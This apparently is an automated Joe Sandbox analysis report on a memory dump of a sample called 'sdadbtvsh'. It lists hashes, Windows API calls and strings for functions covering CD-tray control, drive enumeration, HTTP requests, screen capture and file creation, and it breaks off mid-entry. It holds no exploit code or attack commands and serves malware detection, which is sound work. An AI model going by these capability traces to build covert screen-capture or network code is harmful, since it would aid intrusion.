Opcode ID: f40f2f5f17d05ca6575b5466a2ddeeb97db00b6841b09500040147a46b5ec077
Instruction ID: 0684b6825a53a2d19a1619fecd332b9230e2e0a945f35b8e69fcdab722051e4b
Opcode Fuzzy Hash: f40f2f5f17d05ca6575b5466a2ddeeb97db00b6841b09500040147a46b5ec077
Instruction Fuzzy Hash: C1E19D31208B128FCB14EF24D45486ABBE6BFEA314B14495DF8969B762DB30ED45CF81

Uniqueness

Uniqueness Score: -1.00%

Function 006047D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00604852
_wcslen.LIBCMT ref: 0060485D
_wcslen.LIBCMT ref: 006048B4
_wcslen.LIBCMT ref: 006048F2
GetDriveTypeW.KERNEL32(?), ref: 00604930
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00604978
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006049B3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006049E1

Strings

set cd door , xrefs: 00604982
wait, xrefs: 0060499E
open, xrefs: 006048AE, 006048B3
type cdaudio alias cd wait, xrefs: 0060495B
closed, xrefs: 00604862, 00604887, 006048A0, 006048D8, 006048F1
close, xrefs: 00604858, 00604872
open , xrefs: 0060493F
close cd wait, xrefs: 006049CC

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 4ecacdbf64f8bb011566785335d31a8f3e899de1928db76c24a49d951e394c5e
Instruction ID: 31267cae3b3e19edd9424fe198e7a294660c9f6ed3368fb1f2e7da7f1da849de
Opcode Fuzzy Hash: 4ecacdbf64f8bb011566785335d31a8f3e899de1928db76c24a49d951e394c5e
Instruction Fuzzy Hash: 5371E2716446029FCB24DF24C8809ABBBE6FF94754F00492CF995972A1EF30DD4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 005F62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 005F62BD
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005F62CF
SetWindowTextW.USER32(?,?), ref: 005F62E6
GetDlgItem.USER32(?,000003EA), ref: 005F62FB
SetWindowTextW.USER32(00000000,?), ref: 005F6301
GetDlgItem.USER32(?,000003E9), ref: 005F6311
SetWindowTextW.USER32(00000000,?), ref: 005F6317
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005F6338
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005F6352
GetWindowRect.USER32(?,?), ref: 005F635B
_wcslen.LIBCMT ref: 005F63C2
SetWindowTextW.USER32(?,?), ref: 005F63FE
GetDesktopWindow.USER32 ref: 005F6404
GetWindowRect.USER32(00000000), ref: 005F640B
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 005F6462
GetClientRect.USER32(?,?), ref: 005F646F
PostMessageW.USER32(?,00000005,00000000,?), ref: 005F6494
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005F64BE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6daa2b493ed072e9367011ec3da73fae374aac5c88069c4aedda138ad3dab632
Instruction ID: fdb428af59493cf1358d823d4563a91fe82587ff6af5fba400a689828faee7db
Opcode Fuzzy Hash: 6daa2b493ed072e9367011ec3da73fae374aac5c88069c4aedda138ad3dab632
Instruction Fuzzy Hash: D4719131900709AFDB20DFA8CE89BAEBBF5FF48705F104919E646A35A0D779E945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0061076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00610784
LoadCursorW.USER32(00000000,00007F8A), ref: 0061078F
LoadCursorW.USER32(00000000,00007F00), ref: 0061079A
LoadCursorW.USER32(00000000,00007F03), ref: 006107A5
LoadCursorW.USER32(00000000,00007F8B), ref: 006107B0
LoadCursorW.USER32(00000000,00007F01), ref: 006107BB
LoadCursorW.USER32(00000000,00007F81), ref: 006107C6
LoadCursorW.USER32(00000000,00007F88), ref: 006107D1
LoadCursorW.USER32(00000000,00007F80), ref: 006107DC
LoadCursorW.USER32(00000000,00007F86), ref: 006107E7
LoadCursorW.USER32(00000000,00007F83), ref: 006107F2
LoadCursorW.USER32(00000000,00007F85), ref: 006107FD
LoadCursorW.USER32(00000000,00007F82), ref: 00610808
LoadCursorW.USER32(00000000,00007F84), ref: 00610813
LoadCursorW.USER32(00000000,00007F04), ref: 0061081E
LoadCursorW.USER32(00000000,00007F02), ref: 00610829
GetCursorInfo.USER32(?), ref: 00610839
GetLastError.KERNEL32 ref: 0061087B

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 13dd5e6622902bd3fad144da7083def304f7d1d371cd58a485cace85016489e0
Instruction ID: 703efa4ac42c35432f36bb39d92634635f00f8f5bc48685017daef93f07b1f2c
Opcode Fuzzy Hash: 13dd5e6622902bd3fad144da7083def304f7d1d371cd58a485cace85016489e0
Instruction Fuzzy Hash: 06418670D08319AADF50DFBA8C8989EBFE9FF44354B54452AE11CE7291DA78D841CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005B0456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005B0456

Part of subcall function 005B047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0066170C,00000FA0,0A78CFEC,?,?,?,?,005D2753,000000FF), ref: 005B04AC
Part of subcall function 005B047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005D2753,000000FF), ref: 005B04B7
Part of subcall function 005B047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005D2753,000000FF), ref: 005B04C8
Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005B04DE
Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005B04EC
Part of subcall function 005B047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005B04FA
Part of subcall function 005B047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0525
Part of subcall function 005B047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0530

___scrt_fastfail.LIBCMT ref: 005B0477

Part of subcall function 005B0433: __onexit.LIBCMT ref: 005B0439

Strings

InitializeConditionVariable, xrefs: 005B04D8
WakeAllConditionVariable, xrefs: 005B04F2
kernel32.dll, xrefs: 005B04C3
SleepConditionVariableCS, xrefs: 005B04E4
api-ms-win-core-synch-l1-2-0.dll, xrefs: 005B04B2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: b2c402cfe52dc739cdb12399aa68eebf7563c15763ad3991afc80839e8c852ef
Instruction ID: 786006f3453a1c2ab2f2952650cbeb86e42250fd45c2933041a262ef56200197
Opcode Fuzzy Hash: b2c402cfe52dc739cdb12399aa68eebf7563c15763ad3991afc80839e8c852ef
Instruction Fuzzy Hash: C1210E326407116BD7305BA4AC0ABAB3FD6FF45B61F052115F501976D0DB70AC05CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00604E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0062DCD0), ref: 00604E81
_wcslen.LIBCMT ref: 00604E95
_wcslen.LIBCMT ref: 00604EF3
_wcslen.LIBCMT ref: 00604F4E
_wcslen.LIBCMT ref: 00604F99
_wcslen.LIBCMT ref: 00605001

Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B

GetDriveTypeW.KERNEL32(?,00657C10,00000061), ref: 0060509D

Strings

cdrom, xrefs: 00604EE9, 00604EEE
fixed, xrefs: 00604F8F, 00604F94
ramdisk, xrefs: 0060504B
network, xrefs: 00604FF7, 00604FFC
removable, xrefs: 00604F44, 00604F49
all, xrefs: 00604E8B, 00604E90
unknown, xrefs: 00605062

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 11dbd61c25f4cbc81dd773cae0d93a35ef8eb126556fa0ba02c83cc9d3eeb7cc
Instruction ID: a67620c2e1f20dbec3b32c0fa3204570b566c1bd45ac1aefe0dae78fcc9f85ad
Opcode Fuzzy Hash: 11dbd61c25f4cbc81dd773cae0d93a35ef8eb126556fa0ba02c83cc9d3eeb7cc
Instruction Fuzzy Hash: 2CB1D2716487029FC724DF28D990AAFBBE6BFD4720F10491DF59687292DB30D845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00614946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0062DCD0), ref: 00614A18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00614A2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0062DCD0), ref: 00614A4F
FreeLibrary.KERNEL32(00000000,?,0062DCD0), ref: 00614A9B
StringFromGUID2.OLE32(?,?,00000028,?,0062DCD0), ref: 00614B05
SysFreeString.OLEAUT32(00000009), ref: 00614BBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00614C25
SysFreeString.OLEAUT32(?), ref: 00614C4F

Strings

GetModuleHandleExW, xrefs: 00614A24
kernel32.dll, xrefs: 00614A13

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 03f5de321cbe78208ed4cde02e13550f30e6400cea4c1c893cbc3480745b9d4f
Instruction ID: 19c4b63f3e7b8adbb62bba648d7fdb8c52bcfaede5145b4c89ac494e693fc39b
Opcode Fuzzy Hash: 03f5de321cbe78208ed4cde02e13550f30e6400cea4c1c893cbc3480745b9d4f
Instruction Fuzzy Hash: A7122E71A00115EFDB14DF54C884EEEBBB6FF45314F298098E915AB261DB31ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0060CDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060CE0D
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060CE20
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060CE34
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0060CE4D
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0060CE90
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0060CEA6
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060CEB1
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060CEE1
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060CF39
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060CF4D
InternetCloseHandle.WININET(00000000), ref: 0060CF58

Strings

, xrefs: 0060CED2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 31a4a6ec6ffb6b50da6f5566f26911052e993f4b22530cc0ead93684280f771d
Instruction ID: 6fc74ce21fd9b98ff96041d80bf043d135dc402a2681aad299b3b5396508ff77
Opcode Fuzzy Hash: 31a4a6ec6ffb6b50da6f5566f26911052e993f4b22530cc0ead93684280f771d
Instruction Fuzzy Hash: 5F51AFB0540609BFDB259F60CC48AAB7BFEFF08764F108619F945C6290D734D905DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00628ECE Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00628EF1
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F01
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F0C
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F19
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F27
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F36
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F3F
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F46
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00628F57
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00630C04,?), ref: 00628F70
GlobalFree.KERNEL32(00000000), ref: 00628F80
GetObjectW.GDI32(?,00000018,?), ref: 00628FA0
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00628FD0
DeleteObject.GDI32(?), ref: 00628FF8
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0062900E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4cbc3b7a18bb91f84ca5386a0adceb050b2d5df06f885616e4d8784419d5ec6f
Instruction ID: 31c5b6e81da10f4763b2ca68210ef8fc416db773f1f8cfdd2368c8f58cde2e0a
Opcode Fuzzy Hash: 4cbc3b7a18bb91f84ca5386a0adceb050b2d5df06f885616e4d8784419d5ec6f
Instruction Fuzzy Hash: 31411A75601614AFDB21DF65DD48EAE7BBAEF89751F104058F905D7260DB30AE02CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00612EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00612F35
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00612F45
CreateCompatibleDC.GDI32(?), ref: 00612F51
SelectObject.GDI32(00000000,?), ref: 00612F5E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00612FCA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00613009
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0061302D
SelectObject.GDI32(?,?), ref: 00613035
DeleteObject.GDI32(?), ref: 0061303E
DeleteDC.GDI32(?), ref: 00613045
ReleaseDC.USER32(00000000,?), ref: 00613050

Strings

(, xrefs: 00612FEA

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a66e872b74a3ea7e3b64a5dd2ed55df3eba0c1200e0d2c7ffb80b6affc827bf5
Instruction ID: 2b8167192c3c554b598a639554711fbda7c5509f391081b6d1c37c524fac1eaf
Opcode Fuzzy Hash: a66e872b74a3ea7e3b64a5dd2ed55df3eba0c1200e0d2c7ffb80b6affc827bf5
Instruction Fuzzy Hash: 0461F2B5D00219EFCF14CFA8D888AEEBBB6FF48310F248419E955A7250D771A952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 005F51E3 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 005F5223
GetWindowTextW.USER32(?,?,00000400), ref: 005F5269
_wcslen.LIBCMT ref: 005F527A
CharUpperBuffW.USER32(?,00000000), ref: 005F5286
_wcsstr.LIBVCRUNTIME ref: 005F52BB
GetClassNameW.USER32(00000018,?,00000400), ref: 005F52F3
GetWindowTextW.USER32(?,?,00000400), ref: 005F532C
GetClassNameW.USER32(00000018,?,00000400), ref: 005F5375
GetClassNameW.USER32(?,?,00000400), ref: 005F53AF
GetWindowRect.USER32(?,?), ref: 005F541A

Strings

ThumbnailClass, xrefs: 005F52FE, 005F5380

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 0ab924be822bcdd2109b9de2eed8db3a054a1932328f2d3a9e3d3043bf2d1cf1
Instruction ID: cf39d1728524f858222cadd4465f44d245943eb146ce5f5863b871e0d709a855
Opcode Fuzzy Hash: 0ab924be822bcdd2109b9de2eed8db3a054a1932328f2d3a9e3d3043bf2d1cf1
Instruction Fuzzy Hash: 5A91CF7110470A9FDB14CF14C989BBA7BA9FF84351F044529FF899A092EB38ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005FC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00662990,000000FF,00000000,00000030), ref: 005FC888
SetMenuItemInfoW.USER32(00662990,00000004,00000000,00000030), ref: 005FC8BD
Sleep.KERNEL32(000001F4), ref: 005FC8CF
GetMenuItemCount.USER32(?), ref: 005FC915
GetMenuItemID.USER32(?,00000000), ref: 005FC932
GetMenuItemID.USER32(?,-00000001), ref: 005FC95E
GetMenuItemID.USER32(?,?), ref: 005FC9A5
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005FC9EB
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FCA00
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FCA21

Strings

0, xrefs: 005FC819

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 0cf6026a8bf612314ab32b9f81e8fc5990c025ae38d70a891347ba22bdc76048
Instruction ID: ddc185e688bca1c6a9472801a71c2895c9fd2cc14b1ae03cf16e73a498ea6082
Opcode Fuzzy Hash: 0cf6026a8bf612314ab32b9f81e8fc5990c025ae38d70a891347ba22bdc76048
Instruction Fuzzy Hash: E7618E7090024EAFDF21CF64CA88AFEBFA9FF45344F100429EA41A3291D779AD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005FE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 005FE3E9
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005FE40F
_wcslen.LIBCMT ref: 005FE419
_wcsstr.LIBVCRUNTIME ref: 005FE469
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005FE485

Strings

\VarFileInfo\Translation, xrefs: 005FE47D
%u.%u.%u.%u, xrefs: 005FE563
04090000, xrefs: 005FE4BB
StringFileInfo\, xrefs: 005FE458
DefaultLangCodepage, xrefs: 005FE4E8

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 1f6b63eda9719378da584a9d6ce56ed9d921996bab76739fcb2e20a33de57502
Instruction ID: d995a1f33f6db7e5f7acc0b1885d7617356b2dfb7d155fbd10bda1cbb583facb
Opcode Fuzzy Hash: 1f6b63eda9719378da584a9d6ce56ed9d921996bab76739fcb2e20a33de57502
Instruction Fuzzy Hash: ED411C726403197BEB14AB649C4BEFF3FACFF95710F100465F900A61D2FB78AA0196A5

Uniqueness

Uniqueness Score: -1.00%

Function 00604678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060469A
_wcslen.LIBCMT ref: 006046C7
CreateDirectoryW.KERNEL32(?,00000000), ref: 006046F7
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00604718
